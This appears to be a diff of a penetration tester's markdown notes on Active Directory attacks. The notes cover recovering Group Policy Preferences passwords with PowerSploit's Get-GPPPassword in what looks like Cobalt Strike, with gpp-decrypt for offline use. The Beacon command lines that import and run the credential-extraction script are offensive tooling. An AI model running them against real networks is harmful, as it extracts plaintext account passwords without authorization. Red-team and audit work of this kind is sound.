tequreq/security/cobalt/more-fun-in-ad.md

 ```

 ```
+GPP for setting admin passwords really only applicable to windows 2008 and older.
+After that LAPS is the standard method.
+Still useful to check though in case didn't clean up somewhere

 #Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
 powershell-import /opt/PowerSploit/Exfiltration/Get-GPPPassword.ps1
 powershell Get-GPPPassword

 https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1

+(if using offline then use gpp-decrypt)
 ```

 Note: Great cheat sheets for powerview, powerup,powersploit, etc.